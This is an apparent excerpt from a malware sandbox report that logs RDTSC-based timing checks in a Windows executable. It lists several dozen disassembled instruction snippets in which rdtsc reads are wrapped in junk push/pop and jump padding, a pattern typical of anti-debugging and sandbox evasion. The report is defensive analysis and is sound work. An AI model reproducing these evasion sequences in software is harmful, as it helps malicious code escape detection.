                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7671E1 second address: 767209 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F488C756D08h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f je 00007F488C756CF6h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7673C4 second address: 7673CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76D5F0 second address: 76D5F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76D5F5 second address: 76D5FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76D5FB second address: 76D5FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71EA46 second address: 71EA51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F488D0453F6h 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71EA51 second address: 71EA57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71EA57 second address: 71EA5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71EA5B second address: 71EA69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71EA69 second address: 71EA6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76DE02 second address: 76DE15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756CFFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77161C second address: 771622 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 771622 second address: 77162C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F488C756D02h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77162C second address: 77163E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F488D0453F6h 0x0000000a js 00007F488D045402h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77163E second address: 771644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 775317 second address: 775321 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F488D0453F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 775321 second address: 775360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jmp 00007F488C756D00h 0x0000000d jnl 00007F488C756D0Fh 0x00000013 ja 00007F488C756CFEh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77548F second address: 775493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 775493 second address: 77549D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F488C756CF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 775730 second address: 77573E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77573E second address: 77577E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F488C756CF6h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F488C756D01h 0x00000011 popad 0x00000012 jne 00007F488C756CF8h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jne 00007F488C756D07h 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 775BC6 second address: 775BEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F488D0453F6h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F488D045409h 0x00000011 popad 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77E741 second address: 77E77A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756D08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F488C756D08h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77E77A second address: 77E77E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77C70E second address: 77C717 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77CA2E second address: 77CA4A instructions: 0x00000000 rdtsc 0x00000002 jg 00007F488D0453F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F488D0453FCh 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77CA4A second address: 77CA60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F488C756D01h 0x00000009 pop ebx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77CA60 second address: 77CA66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D04F second address: 77D05B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F488C756CF6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D05B second address: 77D072 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F488D045403h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D072 second address: 77D08A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F488C756CF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jne 00007F488C756CF8h 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D08A second address: 77D08F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D5E9 second address: 77D5EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D5EF second address: 77D5F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D8BF second address: 77D8C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D8C3 second address: 77D8E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F488D045409h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D8E2 second address: 77D8F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F488C756CF6h 0x0000000a jnl 00007F488C756CF6h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D8F2 second address: 77D8F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D8F6 second address: 77D8FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D8FC second address: 77D906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D906 second address: 77D90A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D90A second address: 77D91E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F488D0453F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 push edi 0x00000012 pop edi 0x00000013 pop ecx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77E1B3 second address: 77E1B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77E1B7 second address: 77E1C8 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F488D0453F6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77E470 second address: 77E474 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 783375 second address: 783389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F488D0453FCh 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 783389 second address: 7833AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F488C756D08h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 787387 second address: 78738B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78738B second address: 78738F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78738F second address: 787395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78651D second address: 786531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F488C756CFEh 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 786531 second address: 78653D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jc 00007F488D0453F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78653D second address: 786546 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7867CD second address: 7867D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 786929 second address: 786932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 786932 second address: 786947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F488D045401h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 786947 second address: 78695F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756D00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78695F second address: 786965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 786965 second address: 786969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 786969 second address: 7869A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F488D045406h 0x00000010 jns 00007F488D0453F6h 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F488D045404h 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7869A8 second address: 7869AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7869AD second address: 7869B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78F39D second address: 78F3A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78F3A1 second address: 78F3C0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F488D0453F6h 0x00000008 jmp 00007F488D045405h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78D4C4 second address: 78D4CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F488C756CF6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78D4CE second address: 78D4DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop edi 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78D4DA second address: 78D4E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F488C756CF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78D4E5 second address: 78D4EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78DA7E second address: 78DA8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F488C756CF6h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78DA8B second address: 78DA9E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F488D0453FDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78DD57 second address: 78DD64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jg 00007F488C756CF6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78E02D second address: 78E06D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F488D0453FEh 0x0000000b jmp 00007F488D045402h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jne 00007F488D0453F6h 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f jne 00007F488D0453FCh 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78F1DD second address: 78F1E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78F1E1 second address: 78F1F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007F488D0453F6h 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78F1F3 second address: 78F216 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756D05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007F488C756D12h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78F216 second address: 78F248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F488D045406h 0x00000009 push edi 0x0000000a jmp 00007F488D045404h 0x0000000f pushad 0x00000010 popad 0x00000011 pop edi 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7942E7 second address: 7942EC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7942EC second address: 7942FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jo 00007F488D045408h 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7942FE second address: 794306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 794147 second address: 79414B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79414B second address: 794161 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756D02h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 794161 second address: 794167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 794167 second address: 79417F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jo 00007F488C756CF6h 0x00000009 jbe 00007F488C756CF6h 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79417F second address: 79418F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F488D0453F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79418F second address: 794197 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79AA79 second address: 79AA98 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F488D045401h 0x00000008 pushad 0x00000009 popad 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F488D0453F6h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79AA98 second address: 79AA9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A5F1C second address: 7A5F2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jl 00007F488D0453F6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A5A5A second address: 7A5A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007F488C756CFEh 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007F488C756D07h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A5A90 second address: 7A5A95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A5A95 second address: 7A5A9F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F488C756CFEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AC027 second address: 7AC02D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AC02D second address: 7AC034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AC034 second address: 7AC099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jns 00007F488D045412h 0x0000000b popad 0x0000000c pushad 0x0000000d jnl 00007F488D045411h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F488D045407h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ABB96 second address: 7ABB9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ABB9A second address: 7ABB9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ABB9E second address: 7ABBA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ABD01 second address: 7ABD0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ABD0C second address: 7ABD59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756D01h 0x00000007 jnl 00007F488C756CFCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007F488C756D09h 0x00000017 jne 00007F488C756CF6h 0x0000001d jnc 00007F488C756CF6h 0x00000023 popad 0x00000024 push edi 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ABD59 second address: 7ABD64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F488D0453F6h 0x0000000a pop edi 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ABD64 second address: 7ABD7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F488C756D03h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
